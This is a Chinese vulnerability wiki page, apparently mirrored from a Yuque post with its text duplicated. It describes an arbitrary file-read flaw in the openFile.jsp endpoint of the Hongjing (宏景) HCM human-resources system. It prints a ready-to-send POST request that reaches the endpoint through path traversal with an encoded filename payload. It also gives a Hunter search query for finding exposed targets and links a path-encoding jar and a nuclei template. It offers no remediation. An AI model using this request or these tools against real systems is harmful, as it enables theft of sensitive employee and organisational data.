fofamini-wiki

登录白背景

源码

宏景人力资源信息管理系统openFile存在任意文件读取漏洞

一、漏洞简介

宏景人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件，旨在帮助企事业单位构建高绩效组织，推动组织健康成长，提升组织软实力。系统功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理，以及人事、绩效、培训、招聘、考勤等业务自助，还具备报表功能和灵活的表格工具，支持集团管控、目标管理、领导决策等应用。宏景人力资源信息管理系统openFile存在任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息。

二、影响版本

宏景人力资源信息管理系统

三、资产测绘

hunterapp.name="宏景 HCM"
特征

四、漏洞复现

POST /templates/attestation/../../general/muster/hmuster/openFile.jsp HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Content-Length: 160
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Upgrade-Insecure-Requests: 1

filename=8uHo1M8Ok6bZ468mKmzw7xWCzPAATTP2HJBPAATTP8j8sjHiBmsb9ThhDsrcV8PAATTP2HJBPAATTPG67rw8nTSnppHAL6UwTPAATTP2HJBPAATTPZPAATTP2HJBPAATTP9x5w4PAATTP3HJDPAATTP

文件读取路径加解密工具
Mosaic-hongjing-tools-1.0-SNAPSHOT-jar-with-dependencies.jar

nuclei脚本
Hongjing-templates-wenjianduqu.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/hhqzrmg75vrxgfug

# 宏景人力资源信息管理系统openFile存在任意文件读取漏洞

# 一、漏洞简介
宏景人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件，旨在帮助企事业单位构建高绩效组织，推动组织健康成长，提升组织软实力。系统功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理，以及人事、绩效、培训、招聘、考勤等业务自助，还具备报表功能和灵活的表格工具，支持集团管控、目标管理、领导决策等应用。宏景人力资源信息管理系统openFile存在任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息。

# 二、影响版本

- 宏景人力资源信息管理系统

# 三、资产测绘

- hunter`app.name="宏景 HCM"`
- 特征

![image.png](./img/8vOKBhqwMdPWBy1N/1702368984886-bd83145b-caba-4fdc-9916-c5473e122d40-039637.png)

# 四、漏洞复现
```
POST /templates/attestation/../../general/muster/hmuster/openFile.jsp HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Content-Length: 160
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Upgrade-Insecure-Requests: 1

filename=8uHo1M8Ok6bZ468mKmzw7xWCzPAATTP2HJBPAATTP8j8sjHiBmsb9ThhDsrcV8PAATTP2HJBPAATTPG67rw8nTSnppHAL6UwTPAATTP2HJBPAATTPZPAATTP2HJBPAATTP9x5w4PAATTP3HJDPAATTP
```
![image.png](./img/8vOKBhqwMdPWBy1N/1702464738219-dac06489-1604-4245-ba7f-cd63b2d4f08b-270564.png)
文件读取路径加解密工具
[Mosaic-hongjing-tools-1.0-SNAPSHOT-jar-with-dependencies.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709219600453-e938e6c3-1b2e-42fe-9789-b4c4daca6799.jar?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fjar%2F1622799%2F1709219600453-e938e6c3-1b2e-42fe-9789-b4c4daca6799.jar%22%2C%22name%22%3A%22Mosaic-hongjing-tools-1.0-SNAPSHOT-jar-with-dependencies.jar%22%2C%22size%22%3A38887%2C%22ext%22%3A%22jar%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u5c156c86-d08f-4caa-bc21-039d7a2829b%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fjava-archive%22%2C%22__spacing%22%3A%22both%22%2C%22id%22%3A%22ua0de59b7%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)
![image.png](./img/8vOKBhqwMdPWBy1N/1702464774187-b55e6ce8-931e-4b58-b80d-2a24c8778827-374203.png)
nuclei脚本
[Hongjing-templates-wenjianduqu.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709219600744-bdceea86-7d2d-4350-8c59-ed6c53ba3316.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709219600744-bdceea86-7d2d-4350-8c59-ed6c53ba3316.yaml%22%2C%22name%22%3A%22Hongjing-templates-wenjianduqu.yaml%22%2C%22size%22%3A1157%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u44b2ec05-e118-4122-9009-626cb780ac1%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22id%22%3A%22u1058b431%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hhqzrmg75vrxgfug>